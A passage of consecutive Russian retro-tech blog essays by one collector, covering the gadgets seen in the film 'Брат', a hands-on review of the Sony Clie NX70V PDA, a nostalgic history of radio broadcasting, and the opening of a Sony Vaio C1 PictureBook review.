Интерьер квартиры богатого человека. На заднем плане трудно идентифицируемый видеомагнитофон, скорее всего Panasonic. Здесь (45-я минута) нам дают важную подсказку: Данила звонит брату на сотовый, а тот просит его перезвонить на городской (плохо слышно).


На городском телефоне есть определитель номера, таким образом Татарин узнает адрес подруги Данилы. Можно сделать два вывода: во-первых, сотовая связь в Санкт-Петербурге 1996 года так себе, во-вторых, на мобильном телефоне номер определить не получается.


Еще один вид на телефонную будку. Аппарат советский, принимавший некогда двухкопеечные монеты, но видимо переделанный под жетоны. Фасад поменяли на современный, с кнопочным набором. В моем провинциальном городе жетоны так и не ввели: таксофоны были бесплатными для местных звонков до самого их исчезновения.


Данила осваивает новую технику. В комнате его подруги видеомагнитофон попроще Электроника ВМ-12.


А плей у тебя тут какая кнопка? Зеленая!. И еще: Это Наутилуса концерт. Юбилейный. Очень редкий, я достал.


На заднем плане два поколения домашней аудиотехники. Не идентифицированная старая радиола (проигрыватель пластинок, радиоприемник) и модный-современный бумбокс. Коробка от него чуть раньше мелькает прямо в кадре, так что известна точная модель: Panasonic RX-DS15.


CD-проигрыватель, кассетник без автореверса, вместо стирающей головки магнит.


Уже в самом конце фильма видна наклейка на магнитоле с загадочными заклинаниями: FM 2-band CCIR+OIRT. Это намекает на полезную для девяностых фичу: радиоприем был возможен не только в международном диапазоне 87.5-108 Мгц, но и в советском 65.9-74 Мгц. В обиходе они назывались, соответственно, УКВ и FM. Мой бумбокс Sony тех времен (конечно же без CD, но двухкассетник и с автореверсом!) умел принимать только FM, а для УКВ на рынке приобретался конвертер, прицепляемый к антенне.


Общий вид на логово музыкантов. Колонки Radiotechnika S-70. В отличие от более распространенных S-90, имеют встроенный усилитель.


Последнее появление в фильме CD-проигрывателя. В Данилу стреляют, и пуля попадает в плеер. Становится понятно, почему он раньше оказался на ремне. Видны внутренности, которые я могу сравнить с настоящим Discman D-245.


И это не те внутренности! Для большей убедительности в кадр вставили разбитую плату от какого-то другого устройства, которое, впрочем, тоже имеет выход на наушники. Если у вас есть предположения, от чего может быть эта плата поделитесь. Вероятно, это был старый кассетный плеер или переносной магнитофон.


Близится финал. Так как CD больше не на чем слушать, Данила переключается на старомодный винил.


Между тем, во время засады на квартире Татарина мы наблюдаем целых два одинаковых телефона. Пока мы знаем, что это Нокия, что у нее широкие кнопки отбоя и большая батарейка, и нет определителя номера. Вот лучший вид на телефон, который мне удалось добыть:


Я даже нашел на просторах интернета большую инфографику с финскими телефонами разных эпох (по клику вариант покрупнее):


И там не было ничего похожего. Тут я наконец догадался, что в 1996 году это вовсе не обязательно был аппарат стандарта GSM. На места все расставила архивная версия сайта Nokia за декабрь 1996 года:


Это Nokia 440, стандарт NMT-450i. Вес 275 грамм, время автономной работы в режиме разговора от 70 до 150 минут. Сам стандарт связи NMT относится к первому поколению, он аналоговый, в Москве поддерживался оператором МСС, в Санкт-Петербурге (с 1991 года!) Дельта-Телекомом. Связь на относительно низкой частоте отличалась дальнобойностью, но из-за аналоговой природы страдало качество, так что вариант с плохо слышно вполне вероятен. Судя по архиву сайта МСС, услуга определитель номера для абонентов такой сети существовала. Предположим, что в фильме она не была подключена. Для экономии.



Реальность и мифология
Даже спустя 23 года фильм оставляет тяжелое впечатление: ты как будто встраиваешь себя в его искусственную реальность, накладываешь свои впечатления от девяностых на сюжетную канву. И на самом деле зря: повторюсь, мне повезло, мои девяностые были лучше, чем фильме (эту планку достаточно легко преодолеть). Напоследок вот что хочу сказать: данный эксперимент хорошо выявляет разницу в восприятии. Есть то, что с тобой произошло на самом деле. Есть твои воспоминания, и они, хоть и имеют нечто общее с реальностью, уже отличаются: что-то забылось, что-то наоборот кажется ярким и важным, хотя ты тогда мог и не придать значения. Есть отражение реальности в художественном произведении и не надо забывать, что это тоже чей-то пересказ, не обязательно подходящий к тебе.

Проходят годы, уходит немая тоска, новые события вытесняют память. Прошедшее становится неактуальным и превращается в миф. Как в песне Монеточки про девяностые, где все бегают абсолютно голые. Это нормально, рано или поздно такое происходит с любыми событиями, и пусть, хотя ты сам, чуть-чуть повидавший настоящие девяностые, что-то запомнил иначе. Я успешно нашел модель дискмена у Данилы, но не нашел в фильме правду. Даже и не пытался, в отношениях с прошлым мне важнее примирение, без попыток это прошлое приукрасить или очернить. Это такое позитивное следствие принятия самого себя. Когда ты уже достаточно долго прожил, натворил много разной фигни, без такого принятия становится трудно. И еще: музыка деликатнее, чем кино, влияет на воспоминания. Она обычно ничего не навязывает, просто включаешь и перематываешь в голове слегка пожеванный таймлайн своей жизни. Поэтому закончить данный опус я хочу вот так:

Начало двадцать первого века время больших экспериментов с портативными компьютерами и смартфонами. Такого разнообразия форм, интерфейсов, механизмов в карманной технике с тех пор больше не наблюдалось. Большая часть этих экспериментов пришлась на эпоху смартфонов во второй половине нулевых, но и карманным компьютерам в первой половине десятилетия тоже немного досталось. Зная, какие смартфоны в итоге продались миллиардами экземпляров, можно даже утверждать, что их предок не типичная умная нокия 2005 года, а именно КПК с большим сенсорным экраном.

КПК на базе Palm OS выпускали несколько производителей, а сама компания Palm была в роли Google c Android. В смысле, разрабатывала операционную систему, поставляла ее партнерам, но и сама тоже выпускала железо. В 2003 году код и железо разделили, а разработку отдали в свежесозданную независимую компанию PalmSource. Задним числом мы понимаем, что это была не очень хорошая идея. Из-за организационной турбулентности выпущенная летом 2002 года Palm OS 5 станет последней рабочей версией ОС, она с многочисленными твиками доживет до 2007 года, и к тому моменту совершенно устареет.


Но на дворе 2002 год, мы об этих проблемах не знаем, устройства на Palm OS вполне актуальны, и среди них выделяются КПК от Sony. Японского производителя в любом случае не устраивала штатная функциональность Palm OS, будь она хоть трижды незавимой. Sony выпускала КПК с серьезно модифицированной прошивкой, предлагает фичи, которые у самой Palm появятся сильно позже. И главное, пыталась объединить в одном устройстве и клавиатуру, и сенсорный экран, и фотокамеру, и даже MP3-плеер. Получилась лопата. И это, без всяких скидок, была лопата моей мечты.

Мечту удалось реализовать лишь через 19 лет. В 2003 году у меня был КПК Sony Clie бюджетной серии, модель SJ20 с монохромным экраном и без мультимедийных возможностей. Даже он отличался от других доступных по цене пальм экраном высокого разрешения 320x320, по сравнению со штатными 160x160 точек. Представленный в марте 2002 года КПК Clie NR70 был еще круче: цветной дисплей с разрешением 320x480, музыкальный плеер с проводным пультом для переключения треков, позже в модель NR70V добавили встроенную фотокамеру. Уже в октябре того же года анонсируется глубокая переработка оригинала: модель NX70V.

Полностью сменилась аппаратная платформа: вместо процессора Motorola Dragonball с частотой 66 Мгц используется Intel XScale с частотой 200 Мгц. Меняется и софт: вместо традиционной Palm OS четвертой версии предлагается Palm OS 5. Аппаратом мечты этот КПК является потому, что обещает полный набор фич в одном устройстве: помимо традиционно крутого софта для организации дел, контактов и заметок там есть и видео, и фотосъемка, и музыкальный плеер. Хранить тяжелые данные можно на двух картах памяти, стандартов Memory Stick и Compact Flash. В 2021 году я покупаю рабочий экземпляр, недорого, но состоянии пользовались, любили. В первую очередь оцениваю работу механизма. Sony Clie NX70V един в трех лицах. Это обычный КПК с сенсорным экраном:


Это клавиатурный КПК в раскрытом виде:


Кроме того, можно перевернуть экран и не опасаться, что он будет поцарапан в кармане куртки. Для этого устройства не обязателен чехол:


Можно попытаться пристроить КПК в каком-то промежуточном положении экрана, например для просмотра фильмов, когда аппарат лежит на столе:


Привести устройство в рабочий вид было просто. Я поменял батарейку, увеличив время автономной работы с трех минут до штатных 4-5 часов.


И как мог протер металлический корпус от въевшейся грязи. Заодно обратил внимание на то, что некогда белоснежные пластмассовые вставки пожелтели от времени:


В комплекте с устройством имеется док-станция со своим слотом для стилуса. Это все еще КПК, а не смартфон, предполагается активно использовать его в тесной связке с компьютером, а вдали от него работать преимущественно оффлайн, с сохраненными копиями почтовой переписки и даже веб-страниц.


Почти все разъемы и органы управления расположены на левом торце. Здесь подключаются наушники и пульт, есть кнопка Hold для блокировки клавиш, кнопка активации фотокамеры или диктофона. Но самое главное здесь колесо Jog Dial.


Это такая удобная штука, по которой я скучал, перейдя на КПК под управлением Windows Mobile. Это полноценное колесо, а не джойстик с двумя положениями вверх/вниз, с прекрасным тактильными ощущениями от проворачивания. Колесо нажимается для выбора нужного пункта в меню. В своем Clie SJ20 я использовал его для чтения книг и вращения длинных списков, но в NX70 на Jog Dial завязан интерфейс устройства.


Стандартный, расчитанный на тачскрин, интерфейс Palm OS с привычной и актуальной по сей день сеткой иконок, здесь спрятан в пользу вот такой конструкции. Слева показаны категории программ, но вообще-то вы прокручиваете плоский список всех приложений, установленных во внутренней памяти или на карте. Запускается приложение нажатием на колесо. Это позволяет управлять некоторыми функциями не доставая стилус, одной рукой. Очень удобная схема потом перекочует в интерфейс UIQ для смартфонов Sony Ericsson на базе Symbian.


При желании можно вызвать на экран область Graffiti для ввода символов с использованием жестов. На большинстве пальм 2002 года эта зона не является частью дисплея, зато доступна всегда.

Фото
Для знакомства с устройством я хочу протестировать его мультимедийные фичи, так как 19 лет назад они были основным предметом моей зависти я пользовался громоздким CD-MP3-плеером, а тут все включено. Начнем с фотокамеры. Разрешение камеры VGA, по характеристикам она соответствует пристяжному фотоаппарату к моему КПК Handspring Visor 2001 года. Так выглядит интерфейс приложений для фотосъемки:


Есть какие-то настройки качества изображения:


Но вообще их можно не трогать, так как итоговое качество картинки в любом случае будет Хочется подобрать правильное слово. Специфическим? Ожидаемым? Отвратительным?


Посредственным. На уровне камеры в первом смартфоне Nokia 7650.


Самым большим преимуществом фотокамеры NX70 является удобнейшая конструкция: объектив вращается и может использоваться как в закрытом, так и в разложенном виде.


У Sony Clie была возможность делать селфи еще до того, как это стало модным!

Музыка

Перед тестированием музыкального плеера ставлю на устройство необходимый софт. На диске с ПО имеется модифицированная версия стандартного приложения Palm Desktop, несколько необязательных утилит (браузер Netfront, утилита для копирования видео, записанных фирменным софтом Sony с ТВ-тюнера и подобное). Софт устанавливаю на Sony Vaio TZ: ноутбук куда более современный, чем КПК, но с подходящей 32-битной версией Windows XP. Для музыки предлагается установить программу SonicStage версии 1.5, хорошо знакомую мне по минидисковой технике Sony.


А теперь небольшое отступление. В 2002 году уже наверное было понятно, что будущее не за физическими носителями. Точно не за минидиском, потому как уже год доступен плеер Apple iPod и масса аналогов от других производителей, на базе HDD и флеш-памяти. Тем не менее, на тот момент минидиск активно развивается, выпускаются новые устройства, появляется возможность копировать музыку на минидиск с компьютера. Интеграция а-ля айпод реализуется в фирменном для Sony стиле с неизбежными рогатками: свой проприетарный формат сжатия с потерями ATRAC3, необходимость фирменного софта для переноса музыкальных треков. SonicStage тот самый аналог iTunes, музыкальный комбайн со встроенным интернет-магазином. Новые мультимедийные КПК пытаются привязать к общей экосистеме.

Вы спросите: а можно просто MP3 на карту кинуть и послушать на КПК? К счастью можно, с некоторыми ограничениями (не поддерживается переменный битрейт, например, а файлы нужно кидать в общую кучку, без разделения на папки). Через SonicStage можно копировать файлы в проприетарном формате ATRAC3. Если у вас, помимо КПК, есть минидиск, и вы храните музыку в этом формате, или же (ну вдруг) вы покупаете треки в тогда еще живом магазине Sony, или у партнеров, вы наверное захотите копировать на Clie треки через SonicStage.


И вот здесь все сложно. Начну с хорошего: Sony добавили в Palm OS возможность простой передачи файлов на карту памяти при подключении к КПК. Напомню, что в стандартной версии ОС, по крайней мере тогда, этой фичи не было, только через Palm Desktop со сложными реверансами по заворачиванию данных. Но для корректной работы у вас должна быть не простая карта памяти, а золотая специальная с поддержкой фичи MagicGate. Если не вдаваться в детали, это метод соблюдения авторских прав, и он у меня просто не заработал.


Вроде бы правильный логотип на карте памяти есть, но сама она не от Sony. Возможно имеется какое-то несоответствие версий ПО, как правильно предполагает программа SonicStage при подключении КПК (просто вставленную в карт-ридер карточку она вообще не видит). Я разведаю этот тонкий процесс как-нибудь потом, а пока сделаю то же, что бы сделал в 2002 году: скажу НУ НАФИГ и просто кину MP3 на карту памяти.


Встроенный плеер сканирует карту памяти при каждом запуске, благо файлов на 512-мегабайтную Memory Stick все равно помещается немного. У него достаточно приятный интерфейс, который честно повторяет фичи аппаратных плееров на CD или минидиске: простые режимы воспроизведения, усиление басов и подобное. Даже пищит при переключении треков, как CD-портатив. Главная фича скрывается в настройках:


Плеер работает даже в фоне, при том, что сама операционная система Palm OS однозадачная.


Штатный проводной пульт позволяет не доставать КПК из кармана при ходьбе. Обратите внимание на приятную деталь: у него есть выступ, позволяющий использовать пульт в качестве стилуса. Со скидкой на возраст, аудиоплеер из Sony Clie получается вполне неплохой. В других устройствах тех времен даже выход на наушники не всегда был стандартный. Таким же образом попробуем штатный видеоплеер.

Видео

Конвертировать видео придется: процессор с частотой 200 мегагерц точно не справится с воспроизведением распространенных на тот момент 700-мегабайтных видеороликов в DVD-качестве. А если бы мог, они бы не поместились на карту памяти. Проблема в том, что те самые DVD-рипы штатный конвертер не поддерживает. Поэтому я экспериментировал на сто лет назад скачанных видеороликах в формате Apple QuickTime. И так невеликого качества исходник размером 40 мегабайт сжался до 11, при том же разрешении 320x240.


В целом это рабочее решение, вот только бы карту памяти вставить побольше. Подождите, у нас же есть слот Compact Flash.

Страдания по карте памяти
Слот-то есть, только устройство не видит вставленные в него карты памяти. Как выяснилось, именно в этой модели данный слот был предназначен только для фирменного адаптера Wi-Fi 802.11, и ни для чего другого. В отличие от музыкальных заморочек, здесь скорее всего нет злого умысла. Просто не успели накодить: в следующей ревизии данной модели карты поддерживаются. Для решения проблемы есть сторонний драйвер:


Он добавляет поддержку обычных карт памяти, и даже модемов с интерфейсом Compact Flash. В результате КПК успешно увидел карту памяти на два гигабайта. Получается по меркам 2002 года ну очень просторная конфигурация: 2,5 гигабайта данных на двух картах памяти. Есть проблема: все штатные утилиты не умеют работать с Compact Flash. Музыкальный и видеоплеер приучены искать файлы только по намертво прошитому пути. Фотоаппарат также может сохранять данные только на Memory Stick, а в режиме видеосъемки при установленном драйвере и вовсе роняет КПК в жесткую перезагрузку с потерей данных. Только штатный менеджер файлов видит обе карты.


В любом случае без стороннего софта не обойтись.

Впечатления
Сейчас принято в объявлениях о продаже старых устройств писать эпитеты легендарный, уникальный, и заодно повышать цену в два раза. Про Sony NX70V я выскажусь скромнее: необычный девайс. Свои впечатления от него я сравниваю с опытом использования КПК HP iPaq hx4700 на Windows Mobile. Их разделяет три года (iPaq был выпущен в 2005 году), а по меркам нулевых это вечность. У HP беспроводные модули встроены, а для работы с Compact Flash не нужен драйвер. Разрешение экрана выше полноценные 640x480. Но дело не в этом. HP работает под управлением Windows Mobile, и в этой портативной ОС не требовалось вставлять костыли для работы плеера в фоновом режиме многозадачность поддерживалась просто так. Но из-за этого и впечатления разные: Windows Mobile тяжела, и хотя и можно пускать в работу много приложений сразу, лучше этого не делать. Palm OS приносит серьезные ограничения, но работает быстро, приложения запускаются почти моментально.


NX70V это смелый эксперимент над формой портативного устройства, попытка реализовать сразу много сценариев его использования. Не во всем получилось удачно: клавиатура с мелкими кнопками хоть и лучше экранной, но многим было проще вводить текст на Palm при помощи Graffiti.


Но вместе с тем здесь много приятных мелких деталей. Колесо Jog Dial, отдельный пульт для управления плеером, или вот стилус, у которого с одной стороны спрятана иголка для нажатия кнопки Reset, а с другой шариковая ручка. Да, здесь много дурацких решений из прошлого, тот же проприетарный разъем с переходником, к которому отдельно подключаются кабель USB и питание. С другой стороны богатый набор небесполезного комплектного софта, включая полную версию офисного пакета Documents to Go и утилиту для резервного копирования. Запоздалое знакомство с лопатой мечты подтвердило имевшиеся у меня 18 лет назад ожидания: отличный портативный компьютер для своего времени, хорошая альтернатива платформе от Microsoft, которая в итоге продержалась на рынке чуть дольше.


После NX70 была выпущена еще одна версия КПК похожего формата: Clie NZ90 с таким же процессором и объемом памяти, но с двухмегапиксельной фотокамерой. В 2005 году Sony прекращает продажи КПК за пределами Японии. Как мы теперь понимаем правильно делает, время мобильных устройств без телефонной части заканчивалось. Но тогда было немного жаль: устройства из Японии хоть и были дорогие, но заметно отличались от множества аналогов по дизайну и функциональности. В лучшую сторону.

Дилетантизм, или дилетантство (от итал. dilettante лат. delectatio увеселение, забава) занятие какой-либо деятельностью (например, наукой, искусством, ремеслом) без должных знаний и профессиональной подготовки.

Эта цитата из Википедии точно описывает мое отношение к радиотехнике. Я не радиолюбитель, и не радиопрофессионал, я даже никогда не собирал свой собственный детекторный приемник. Я радиопользователь, всю жизнь пользующийся этой технологией без должных знаний и подготовки. Если не отвлекаться на беспроводные сети передачи данных (которые в некотором смысле тоже радио), радиоприём аля натюрель, основной источник получения информации для моих прадедов и прабабушек, сейчас используется все реже. Последний форпост этого занятия, прослушивание радиостанций в машине по пути на работу, был разрушен в прошлом году самоизоляцией. Эта статья ненаучное собрание связанных с радио эстетических переживаний. Плюс немного фотографий радиоприемников.



Начну с самого важного: радиовещание это самое долгоживущее высокотехнологичное легаси, которое я только могу представить. Да, есть телефония, но за последние 20-30 лет она изменилась до неузнаваемости. Персональным компьютерам всего полвека, мало. Грампластинки живут и здравствуют, и это действительно древняя технология, но не настолько: у грамофонных пластинок начала прошлого века много отличий от современных. А вот с радиоприемом максимальная стабильность. Настолько, что я могу включить приемник в своем автомобиле 2016 года выпуска и принять на него радиосигнал, отправленный передатчиком столетней давности.

Дневник коллекционера старых железок я веду в Телеграмме.

Совместимость
Моя сфера ретроинтересов компьютеры и домашняя электроника, и я привык иметь дело с устаревшими технологиями, которые были актуальными вроде совсем недавно. С 15-летними ноутбуками, которые не могут толком выйти в сеть. С 10-летними смартфонами, которые почти потеряли связь с инфраструктурой компании-производителя. На такое незапланированное (уверен, здесь нет и не было злого умысла) устаревание я как-то жаловался в этой статье. Тогда же подумал: а есть вообще технологии, которые с годами не изменились, и по-прежнему работают? Желательно более-менее сложные, иначе можно договориться, что самым стабильным достижением человечества является колесо (до сих пор круглое!). Или молоток.

И вот этих сложных технологий без радикальных изменений осталось совсем немного. Фотография теперь цифровая, уже лет пятнадцать у меня нет возможности проявить пленку старым способом на каждом углу, да и пленка эта значительно отличается от ранних технологий девятнадцатого века. Телефония больше не соединяет двух абонентов длинным медным проводом, вместо него тоже цифра, и можно лишь эмулировать аналоговый телефон (или древний модем) при помощи адаптеров. Почти неактуальными стали любые физические носители, хотя CD еще держится, но нельзя сказать, что этот сидюк слушал еще мой прадед. Конечно я тут сознательно себя ограничиваю потребительскими штуками, но, простите, при всем желании я не могу коллекционировать, например, паровозы. Так вот, у меня нет других примеров почти полной совместимости стандартов, приемников, передатчиков, на протяжении всей истории, от изобретения до наших времен, кроме радиосвязи. Если хотите поспорить, добро пожаловать в комментарии.



Видео выше с канала Mr. Carlson's Lab. Он не совсем развлекательный, автор видео последовательно и детально описывает процесс ремонта по большей части очень старых устройств. И каждый раз, когда заканчивает ремонт радиоприемника 80-летней давности, включает его и принимает современное радиовещание на средних волнах, без всяких проблем. Пример с моим автомобилем в начале статьи слегка натянутый. Если я прикручу к нему потоковый накопитель, разгонюсь до 88 миль в час и перемещусь в 1916 год, то в лучшем случае смогу принять экспериментальное радиовещание, ну или морзянку в любых количествах. Но до регулярного вещания тогда оставалось совсем недолго. Примеры: Нидерланды в 1919 году, США в 1920-м, с Шуховской радиобашни в Москве в 1922-м. Частоты 3000 метров (~100 килогерц, длинные волны) в Москве, 1020 килогерц (средние волны) в Питтсбурге, 300-375 килогерц в Гааге. Сто лет совместимости, никаким компьютерным технологиям такое и не снилось.

Коллекционирование
До массового распространения телевидения, радиовещание единственный способ получения информации в режиме реального времени, заменитель интернета для наших предков. Радиоприемники в течение десятилетий представляли собой вершину потребительских технологий. В середине пятидесятых появляются первые транзисторные приемники, радио становится портативным. До этого под радио обычно понимается большой ламповый сундук исключительно для домашнего использования. Первое такое устройство в нашей семье, дожившее до наших дней радиола Урал-49, выпущенная в 1949 году (здесь и далее фотографии взяты с сайта rw6ase.narod.ru).



Дальше в истории семейных гаджетов провал до семидесятых, до портативного радиоприемника ВЭФ-202:



Профессиональный радиоприемник моего детства ИШИМ-003:



Предмет моей зависти: радиоприемник Океан-222 с электронным переключением диапазонов и поддержкой УКВ:



Радиоприемники хранят в себе большую историческую ценность: и с точки зрения технологий, и по дизайну. Эту категорию ретроустройств я пока не начал коллекционировать, и не факт, что соберусь: практической пользы от них мало, а места они занимают много. А если вдруг куплю приемник для интерьера, то буду искать что-то с поддержкой современного FM-диапазона 88-108 Мгц.

Личная история
В силу возраста, важную роль в моей жизни сыграло именно FM-радио. Со стандартизацией вещания в диапазоне УКВ все было несколько сложнее, чем на средних волнах. Первые радиостанции этого формата появились в США еще в сороковых годах прошлого века, и использовали диапазон 42-50 Мгц. В 1945 месный регулятор перенес вещание в привычный диапазон, тогда еще ограниченный частотами 88-106 мегагерц. В 1949 году вещание на старых частотах было прекращено, десятки тысяч дорогих радиоприемников за одну ночь стали бесполезными. Что-то похожее произошло на территории бывшего СССР в начале девяностых. Импортная техника поддерживала западный диапазон частот 88-108 Мгц, советская местный 65,9-74 Мгц. В Японии используется диапазон 76-95 Мгц, что доставляет проблем покупателям подержанных праворульных иномарок.

Радиовещание с использованием частотной модуляции первая реализация того, что сейчас принято называть Hi-Fi. Стереозвук с широкой полосой частот (30 Гц 15 Кгц), низкий уровень помех. В условиях крайне ограниченного ассортимента музыки на кассетах и виниле, музыкальные радиостанции это окно в мир. Преимущества FM по сравнению с АМ-вещанием это круче, чем переход с DVD на HD Video в начале 21-го века.



В начале девяностых у меня появляется первый персональный аудиоплеер со встроенным радиоприемником. Сколько с собой можно унести кассет, рассовав их по карманам? У меня получалось 5-6 штук. Радио давало бесконечный (ну или так казалось) ассортимент музыки, продлевало жизнь полусевшим батарейкам, а заодно (благодаря несовпадению советского и западного диапазонов) позволяло слушать звук от третьей программы телевидения.

В моей коллекции есть пара ящиков кассет: кто-то всю жизнь, в семидесятые и восьмидесятые последовательно записывал с радио джазовые передачи. Да, качество в итоге получается чуть хуже, чем если переписывать с винила. Но по радио транслируются живые выступления, которые возможно и сохранились только у меня в кладовке, и больше ни у кого. Я бы сейчас много отдал, чтобы послушать эфир радиостанций из девяностых, вспомнить и репертуар, и джинглы, и рекламу. Последним радио-явлением в моей истории стала московская станция 106.8 FM, транслировавшая электронную музыку, которую я больше вообще нигде не мог услышать.

Самые приятные детские воспоминания у меня, впрочем, связаны с радиоприемом на средних волнах. УКВ (или FM) тогда было доступно в крупных городах. Отъедешь километров на 50 от областного центра, и переключаешься на СВ. Хорошо помню портативный радиоприемник деда, который он брал с собой на рыбалку и на дачу. И как неожиданно налетевшая грозовая туча неожиданно улучшила прием с двух до двух десятков станций.

Странные звуки
Как звучит FM-радио, знают все. Именно на средних и коротких волнах возникает уникальный экспириенс от прослушивания радиостанций. Если включить радио на этих частотах в обычной городской квартире, скорее всего удастся поймать лишь помехи от ваших (и соседских) импульсных блоков питания, лучше выбраться за город. А там СВ и КВ звучит так же, как 30, 50 и 70 лет назад. Мне важен не столько контент, сколько атмосфера этого низкокачественного радиоприема.

Щелчки от молний из грозовой тучи за десяток километров от тебя. Вой высоковольтных проводов, забивающий радиоволну, когда проезжаешь под ЛЭП. Помехи от станции на соседней частоте, звуки радиомаяков. Ну и конечно потусторонние шумы, природу которых ты иногда можешь объяснить, а иногда не хватает знаний. Номерные радиостанции, транслирующие деревянным голосом последовательность букв, ревущие цифровые радиопередачи. Искаженные голоса радиолюбителей, вещающих в режиме однополосной модуляции. Этот шум ложится в основу музыкальных произведений, а для многих людей чуть старше меня создавал уникальный саундтрек их молодости. Приведу здесь два примера. Криповатое сообщение секретной радиостанции, известной как The Swedish Rhapsody:



И архив записей радиопередачи Рок-Посевы Севы Новгородцева. Передача, относимая на территории СССР к вражеским голосам, систематически глушилась на частотах радиостанции BBC работали мощные передатчики, забивавшие сигнал помехами. Часть архива поздние трансляции записей на FM-радио. Но многие передачи те самые, записанные радиолюбителями в районе полуночи с коротковолнового радиоприемника с качеством как повезет. Вот пример хорошей записи за 1984 год. А вот запись похуже. История радио это также история технологии, способной распространять информацию практически по всему миру, на сотни и тысячи километров. И история попыток ограничить распространение того, что считается вредным. Сейчас это повторяется с другим набором технологий. Прием на средних волнах, со всеми помехами и искажениями, урезанной полосой частот, дает невероятное ощущение связи между разными эпохами, между живыми людьми сейчас и давно ушедшими предками, которые это радио придумали, пробились сквозь атмосферный шум и донесли до нас слова и музыку, в любую точку земли. Почти как сильно позднее это смог сделать интернет, но душевнее что ли.

Современность
У каждого из нас где-нибудь да найдется радиоприемник, но чаще он встроен в другие устройства. В кассетный плеер, в музыкальный центр или ресивер домашнего кинотеатра. В мобильный телефон у меня таких довольно много, причем некоторые (Nokia N900, например) умеют не только принимать FM-радио, но и транслировать сигнал на пару метров. Чистый радиоприемник у меня один относительно современный Tecsun PL600:



Потребительское радио уже не то, что раньше. Станции диапазона FM коммерциализировались и больше не предоставляют мне возможности услышать новую музыку. Точнее предоставляют, но не соответствуют моим вкусам проще найти в интернете. Современный заменитель радио музыкальный стриминг без диджея и рекламы, с автоматическими плейлистами на основе ваших предпочтений. Он на удивление неплохо работает. А если хочется послушать живого человека есть подкасты и традиционные интернет-радиостанции со всего мира. Больше не обязательно заводить по ночам радиоприемник, пытаясь поймать ту самую волну. Можно в интернете послушать например, авангардное радио KEXP из США или же провинциальное "Радио День", прочно застрявшее в девяностых.

Радио на средних волнах до сих пор существует, хотя в районе Москвы лучше дождаться захода солнца, ассортимент будет гораздо больше. Я регулярно беру радиоприемник в турпоездки: выбираюсь вечером на улицу, слушаю то Радио Кубы из Бостона, то Бибиси с острова Тенерифе. По всему миру можно поймать китайское радиовещание на всех языках мира. В Подмосковье я с удовольствием слушал эфир радио Северной Кореи, которое вещает, кажется, прямо из 1950 года.



Закончить этот эмоциональный и непоследовательный опус я хочу еще одной фотографией радиоприемника, для разнообразия импортного. В детстве меня очень привлекали похожие названия городов на шкале радиолы Беларусь. Можно сказать, что это была попытка упростить пользовательский интерфейс писать не бездушные частоты, а названия городов и отдельных радиостанций, к которым вы можете прямо сейчас подключиться. Сейчас удивляет оптимизм тех, кто рисовал эти шкалы. Они правда считали, что эти вот соответствия город частота вещания на века? В нынешнем мире ускоренного прогресса, ежегодного обновления гаджетов, этого постоянства чуть-чуть не хватает.

Как не хватает мне приятной атмосферы бабушкиной кухни, на которой все мое детство висел трехпрограммный радиоприемник и не выключался никогда. Я там ел еду богов, яичницу по особому рецепту как мне нравится, под концерты классической музыки, под театральные постановки, последние известия о состоянии посевной кампании, детские сказки. Именно поэтому, хоть я так и не стал радиопрофессионалом (даже не пытался), классическое, традиционное радио для меня важная примета уходящей эпохи.

20 лет назад я про такие ноутбуки не мечтал: трудно было мечтать про то, что является совершенно недоступным. Но хотелось: максимально компактный, достаточно мощный, легкий, это был самый подходящий лаптоп для иногороднего студента, проводящего долгие часы то в поезде, то в электричке, то в метро. В 2021 году это необычный ретроноутбук: от стандартных для тех лет крупных лаптопов весом в 2-3 кило он отличается почти всем. Один из первых ноутбуков с широким экраном, максимально набитый проприетарными фишечками от Sony, с камерой и Bluetooth. Даже процессор и тот не Intel, и не AMD, а вообще Transmeta Crusoe.



Для коллекционера это ноутбук с оттенками страдания, если ваш экземпляр не имеет дисков восстановления или хотя бы бэкапа фирменых драйверов. В этой статье в формате дорогой дневничок я хочу рассказать об этапах его обслуживания, поделюсь впечатлениями от ультрапортатива двадцатилетней давности и, наконец, сравню самый нестандартный процессор тех времен с нормальным Pentium 3.

Дневник коллекционера старых железок я веду в Телеграмме.

О коробках
К Sony Vaio начала нулевых я присматривался давно, но часто пропускал лоты в сомнительном состоянии, искал что-то особенное, желательно в коробке и с полным комплектом. Такой и купил: хотелось ощутить, как ты заходишь в магазин в 2001 году, выкладываешь сумму, эквивалентную двум с половиной тысячам долларов, и получаешь взамен современный новый ноутбук.



Сам ноутбук оказался в очень приличном состоянии, хотя и не новый: небольшие царапины на крышке, на экране кажется наклеена пленка, а под ней пыль.



Помимо ноутбука в коробке было все, что упоминалось в инструкции. Кроме самой инструкции, она доступна в сети, и это единственное, что сохранилось на серверах Sony. Сам ноутбук, стандартная батарейка с тремя ячейками, блок питания, переходник для подключения к VGA-монитору, две запасных насадки на трекпоинт.

Заводские характеристики у ноутбука версии PCG-C1VFK следующие:

Процессор: Transmeta Crusoe TM5600 667 Mгц, кэш-память 512 кБ
Оперативная память: 128 МБ SDRAM, распаяны на материнской плате
Жесткий диск: 15 ГБ 2.5 дюйма, IDE
Дисплей: 8,95 дюйма, 1024x480
Видеосистема: ATI Rage с 8 МБ видеопамяти, аппаратный декодер MPEG2
Звук: Yamaha DS-XG
Разъемы: PCMCIA Type II, разъем RJ-11 для встроенного модема, микрофон, наушники, композитный видеовыход, VGA (через переходник), USB 1.1, FireWire 400, слот для карт Memory Stick.
Дополнительно: видеокамера с разрешением 320x240, модуль Bluetooth 1.0
Штатная ОС: Windows 2000
Габариты: 248x152x27мм
Вес: 990 грамм со стандартной батареей

Серия Vaio C1 или PictureBook выпускалась с 1998 года в Японии, с начала 2000 года продавалась в Европе и США. До сентября 2000 года ноутбуки серии использовали процессор Intel Pentium II, потом произошел переход на Transmeta. Не позднее 2003 года модель была снята с производства, а ее потомком можно считать серию Sony Vaio P 2009 года, также оснащенную растянутым по ширине восьмидюймовым экраном.

Моя версия выпущена в марте 2001 года, оснащена новейшей на тот момент Windows 2000, которая пришла на смену Windows 98 и ME в предыдущих вариантах. Впервые в ноутбуках серии встроен модуль Bluetooth, а по сравнению с вариантами на Pentium II убран ИК-порт (вместо него карт-ридер для фирменных карточек Sony). Ноутбук оснащен стереодинамиками (в других портативных устройствах монофонический звук попадался вплоть до конца нулевых). Пожалуй самое необычное для портатива начала нулевых это встроенная веб-камера, уникальная фишка Sony, в других устройствах ставшая стандартом лет на пять позже.

